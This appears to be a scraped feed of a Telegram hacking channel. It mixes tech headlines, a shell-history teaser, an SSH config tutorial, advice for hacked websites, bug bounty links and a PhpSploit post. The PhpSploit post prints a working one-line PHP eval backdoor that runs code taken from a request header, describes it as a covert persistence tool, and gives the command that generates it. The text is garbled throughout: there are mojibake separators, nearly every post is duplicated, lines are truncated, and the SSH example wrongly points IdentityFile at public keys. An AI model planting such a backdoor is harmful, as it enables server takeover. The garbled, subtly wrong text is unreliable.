Forwarded from UNDERCODE NEWS
McAfee VirusScan Patch 16 has a security vulnerability, preventing hackers to bypass their restriction.
#Vulnerabilities
#Vulnerabilities
π¦BASIC :
Shell history file
1) Every Unix shell has the ability to log all the commands you run in your Terminal.
2) Depending on the shell used, the commands are stored in a text file elsewhere.
3) In the Bash shell, all commands are written to ~ / .bash_history by default.
4) In the Fish shell, the command records are stored in the ~ / .local / share / fish / fish_history file.
5) In the Zsh shell, commands are saved in ~ / .zsh_history or any other user-configured file.
6) Now the question is, what if you don't want to record command history at all?
7) Perhaps you are using a shared system and do not want to save the commands you run in the history file.
8) If you've ever wanted to stop logging commands in the history file, we'll show you how you can do this one
β β β Uππ»βΊπ«Δπ¬πβ β β β
Shell history file
1) Every Unix shell has the ability to log all the commands you run in your Terminal.
2) Depending on the shell used, the commands are stored in a text file elsewhere.
3) In the Bash shell, all commands are written to ~ / .bash_history by default.
4) In the Fish shell, the command records are stored in the ~ / .local / share / fish / fish_history file.
5) In the Zsh shell, commands are saved in ~ / .zsh_history or any other user-configured file.
6) Now the question is, what if you don't want to record command history at all?
7) Perhaps you are using a shared system and do not want to save the commands you run in the history file.
8) If you've ever wanted to stop logging commands in the history file, we'll show you how you can do this one
β β β Uππ»βΊπ«Δπ¬πβ β β β
Telegram
UNDERCODE TESTING
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to run Fish Shell in private mode on Linux ??
1) Launching Fish Shell in Private Mode on Linux
Since version 3.0, the fish shell comes with the βprivate flag, which can be used to launch the Fish shell in private or incognitoβ¦
π¦π§ How to run Fish Shell in private mode on Linux ??
1) Launching Fish Shell in Private Mode on Linux
Since version 3.0, the fish shell comes with the βprivate flag, which can be used to launch the Fish shell in private or incognitoβ¦
Forwarded from UNDERCODE NEWS
Recruitment shows that Teslaβs autopilot test is extended to Phoenix, USA
#Technologies #international
#Technologies #international
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π How to set up SSH config file on macOS to make it easier to connect to servers ??
1) You are probably using SSH to connect to remote machines for administrative purposes.
Generally, SSH is pretty easy to use.
2) Open your macOS terminal app and enter a command like:
ssh 192.168.1.20
3) As long as your usernames match on both ends, that's okay, but if your usernames don't match, this command might look like:
ssh vega@192.168.1.20
4) What happens if you remotely connect to 10 or 20 different machines during the day, each with a different username and IP address?
π§ How to use SSH configuration for each Linux host
It can get a little confusing after a while.
What if I told you that SSH can use a config file to make things easier?
5) Using the SSH config file, you can configure SSH connections so that you can run the command:
ssh web1
or
ssh db1
6) How do I do this on macOS?
Let's take a look at this with examples.
π¦What do you need
The only thing you need is a MacBook or iMac that connects over SSH to multiple remote servers.
With everything ready, let's make it possible.
7) How to create a config file
Open your macOS terminal app.
Once it opens, navigate to your custom SSH directory using the command:
cd ~ / .ssh
8) In this directory, create a new file using the command:
nano config
9) Let's create our first configuration.
For example, let's say it's a Nextcloud server with an IP address of 192.168.1.20 and the username is vega.
10) We're going to call this server "nextcloud" so we can easily remember how to build a secure shell into it.
We are also going to enable key authentication for connecting to servers.
11) This configuration will look like this:
Host nextcloud
HostName 192.168.1.20
User vega
IdentityFile ~ / .ssh / id_rsa.pub
If you are not using SSH key authentication (which you should), you need to remove the IdentityFile line.
Save and close the file.
12) To connect via SSH to our Nextcloud server, you just need to enter the command:
ssh nextcloud
You can create as many configurations in this file as you need (one for each server), each with different parameters.
12) Just make sure you include at least the Host and Hostname parameters.
This makes it much easier to remotely access these servers from an Apple laptop or desktop.
13) Let's say you are using the same account on all servers in your datacenter using the 192.168.1.x IP address scheme.
You can tweak this at the top of the config file with two simple lines:
Host 192.168.1. *
User USERNAME
14) Where USERNAME is the user on remote machines.
Then you can create each host config entry (below) by excluding the User option, for example:
Host nextcloud
HostName 192.168.1.20
IdentityFile ~ / .ssh / id_rsa.pub
Host web1
HostName 192.168.1.25
Host db1
HostName 192.168.1.100
IdentityFile ~ / .ssh / db_rsa.pub
Save the file.
15) You are now ready to SSH into these machines using commands such as:
ssh nextcloud
ssh web1
ssh db1
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π How to set up SSH config file on macOS to make it easier to connect to servers ??
1) You are probably using SSH to connect to remote machines for administrative purposes.
Generally, SSH is pretty easy to use.
2) Open your macOS terminal app and enter a command like:
ssh 192.168.1.20
3) As long as your usernames match on both ends, that's okay, but if your usernames don't match, this command might look like:
ssh vega@192.168.1.20
4) What happens if you remotely connect to 10 or 20 different machines during the day, each with a different username and IP address?
π§ How to use SSH configuration for each Linux host
It can get a little confusing after a while.
What if I told you that SSH can use a config file to make things easier?
5) Using the SSH config file, you can configure SSH connections so that you can run the command:
ssh web1
or
ssh db1
6) How do I do this on macOS?
Let's take a look at this with examples.
π¦What do you need
The only thing you need is a MacBook or iMac that connects over SSH to multiple remote servers.
With everything ready, let's make it possible.
7) How to create a config file
Open your macOS terminal app.
Once it opens, navigate to your custom SSH directory using the command:
cd ~ / .ssh
8) In this directory, create a new file using the command:
nano config
9) Let's create our first configuration.
For example, let's say it's a Nextcloud server with an IP address of 192.168.1.20 and the username is vega.
10) We're going to call this server "nextcloud" so we can easily remember how to build a secure shell into it.
We are also going to enable key authentication for connecting to servers.
11) This configuration will look like this:
Host nextcloud
HostName 192.168.1.20
User vega
IdentityFile ~ / .ssh / id_rsa.pub
If you are not using SSH key authentication (which you should), you need to remove the IdentityFile line.
Save and close the file.
12) To connect via SSH to our Nextcloud server, you just need to enter the command:
ssh nextcloud
You can create as many configurations in this file as you need (one for each server), each with different parameters.
12) Just make sure you include at least the Host and Hostname parameters.
This makes it much easier to remotely access these servers from an Apple laptop or desktop.
13) Let's say you are using the same account on all servers in your datacenter using the 192.168.1.x IP address scheme.
You can tweak this at the top of the config file with two simple lines:
Host 192.168.1. *
User USERNAME
14) Where USERNAME is the user on remote machines.
Then you can create each host config entry (below) by excluding the User option, for example:
Host nextcloud
HostName 192.168.1.20
IdentityFile ~ / .ssh / id_rsa.pub
Host web1
HostName 192.168.1.25
Host db1
HostName 192.168.1.100
IdentityFile ~ / .ssh / db_rsa.pub
Save the file.
15) You are now ready to SSH into these machines using commands such as:
ssh nextcloud
ssh web1
ssh db1
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to deal with after being hacked (web)
After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.
1. Immediately stop the website service to prevent users from continuing to be affected and to prevent other sites from continuing to be affected (recommended to use the 503 return code).
2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.
3. Clean up the hacked content that has been discovered, set the hacked page to a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.
4. Sort out the possible hacking time, compare it with the file modification time on the server, and process the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: The possible hacking time can be determined from the access log. However, the hacker may also modify the server's access log.
5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.
hope it can be helpful to everyone!"
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to deal with after being hacked (web)
After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.
1. Immediately stop the website service to prevent users from continuing to be affected and to prevent other sites from continuing to be affected (recommended to use the 503 return code).
2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.
3. Clean up the hacked content that has been discovered, set the hacked page to a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.
4. Sort out the possible hacking time, compare it with the file modification time on the server, and process the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: The possible hacking time can be determined from the access log. However, the hacker may also modify the server's access log.
5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.
hope it can be helpful to everyone!"
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦bug bounty pdfs and videos :
https://owasp.org/www-pdf-archive/Getting_Started_with_Bug_Bounty..pdf
https://www.diva-portal.org/smash/get/diva2:723516/FULLTEXT02.pdf
https://foundershield.com/wp-content/uploads/2018/02/state-of-bug-bounty-08-2015.compressed.pdf
https://www.govinfo.gov/content/pkg/CHRG-115shrg37302/pdf/CHRG-115shrg37302.pdf
https://www.youtube.com/watch?v=Qw1nNPiH_Go
1:22 h
https://www.bugcrowd.com/resources/webinars/bug-bounty-hunting-methodology-v2/
1 h
https://www.bugcrowd.com/resources/webinars/bug-bounty-hunter-methodology-v3/
1h 22
https://medium.com/inbughunters/getting-started-in-bug-bounty-7052da28445a
18 min
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦bug bounty pdfs and videos :
https://owasp.org/www-pdf-archive/Getting_Started_with_Bug_Bounty..pdf
https://www.diva-portal.org/smash/get/diva2:723516/FULLTEXT02.pdf
https://foundershield.com/wp-content/uploads/2018/02/state-of-bug-bounty-08-2015.compressed.pdf
https://www.govinfo.gov/content/pkg/CHRG-115shrg37302/pdf/CHRG-115shrg37302.pdf
https://www.youtube.com/watch?v=Qw1nNPiH_Go
1:22 h
https://www.bugcrowd.com/resources/webinars/bug-bounty-hunting-methodology-v2/
1 h
https://www.bugcrowd.com/resources/webinars/bug-bounty-hunter-methodology-v3/
1h 22
https://medium.com/inbughunters/getting-started-in-bug-bounty-7052da28445a
18 min
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is PhpSploit ?
1) PhpSploit is a remote control framework that aims to provide a covert interactive connection, over HTTP, similar to a shell between a client and a web server.
2) It is a follow-up tool capable of maintaining access to a compromised web server for privilege escalation. A fully functional C2 framework that is invisibly stored on a web server as a one-liner backdoor in PHP
3) When you run PhpSploit and generate a standard backdoor for hosting in WordPress or PHP code, the following line will be created, which is a full-fledged backdoor:
<? php @eval ($ _ SERVER ['HTTP_PHPSPL01T']); ?>
4) The above code can be generated by running the following command:
phpsploit --interactive --eval "backdoor"
5) Just one find, ClamAV detects the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY like this:
set PASSKEY xy...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is PhpSploit ?
1) PhpSploit is a remote control framework that aims to provide a covert interactive connection, over HTTP, similar to a shell between a client and a web server.
2) It is a follow-up tool capable of maintaining access to a compromised web server for privilege escalation. A fully functional C2 framework that is invisibly stored on a web server as a one-liner backdoor in PHP
3) When you run PhpSploit and generate a standard backdoor for hosting in WordPress or PHP code, the following line will be created, which is a full-fledged backdoor:
<? php @eval ($ _ SERVER ['HTTP_PHPSPL01T']); ?>
4) The above code can be generated by running the following command:
phpsploit --interactive --eval "backdoor"
5) Just one find, ClamAV detects the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY like this:
set PASSKEY xy...
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Android_app_vulnerability_classes.pdf
332 KB
Overview of common Android app vulnerabilities reported through the Google Play Security Rewards Program β Explicitly not an attempt at creating a complete audit guide β Focused only to vulnerabilities in scope for our bug bounty β For each vulnerability present β Overview β Auditing tips β Remediation tips β Bug bounty pay-out β CWE ID (Common Weakness Enumeration) and other resources
Forwarded from UNDERCODE NEWS
Apple's "chip dream" evaporates Qualcomm 85 billion. Who will be the next supplier to be eliminated?
#Technologies
#Technologies
Forwarded from UNDERCODE NEWS
Behind recycled lithium batteries, the profiteering industry: The recycling market alone hits 117.8 billion
#international
#international
